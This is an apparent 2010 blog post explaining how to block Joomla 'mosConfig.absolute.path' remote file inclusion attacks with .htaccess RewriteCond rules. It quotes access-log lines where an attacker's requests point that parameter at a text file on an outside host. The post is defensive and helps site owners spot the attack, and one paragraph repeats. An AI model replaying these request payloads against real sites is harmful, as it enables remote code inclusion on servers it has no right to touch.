Block mosConfig.absolute.path attack
Published on| May 10th, 2010 | No Comment.
Categories:Preferences |
Recently, I have seen "confirm mosConfig.absolute.path attack" on my site by Joomla!. Then, I felt the necessity for taking some measures.
So this post might help you that have same problem.
Edit .htaccess
This post will explain how to block the attack by an easy .htaccess edit.
# Block out any script trying to set a mosConfig value through the URL RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
You will find the sentence like the above-mentioned to the htaccess file. You will add the following lines under above-line.
RewriteCond %{QUERY_STRING} .*mosConfig.* [OR] RewriteCond %{QUERY_STRING} .*mosconfig.* [OR] RewriteCond %{QUERY_STRING} .*http:.* [OR]
It is very easy.
But you should note at 3 line.
This line means the error is displayed when the character string "http:" is included in the parameter of URL.
You should become careful a plug-in parameter etc.
And, you should confirm the access log. If you were able to find the following access logs, your site might be attacked.
This line means the error is displayed when the character string "http:" is included in the parameter of URL.
You should become careful a plug-in parameter etc.
And, you should confirm the access log. If you were able to find the following access logs, your site might be attacked.
118.220.174.89 - - [27/Apr/2010:02:38:33 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0" 118.220.174.89 - - [27/Apr/2010:02:38:34 +0900] "GET /?option=com_content&view=...40:extemtions&directory=1%20%20//index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 42653 "-" "Mozilla/5.0" 118.220.174.89 - - [27/Apr/2010:02:38:34 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0" 118.220.174.89 - - [27/Apr/2010:02:38:35 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41811 "-" "Mozilla/5.0"
You might also like:
Add to your favorites(bookmarks):
Trackback URL
After Admin approves this comment, it will be shown.
Comments
Leave a Reply
Tag Cloud
Links
Site Description
This site is support & information site of WEB,and Software. This site might help you that create software or Web Site…perhaps?
Add to your favorites(bookmarks)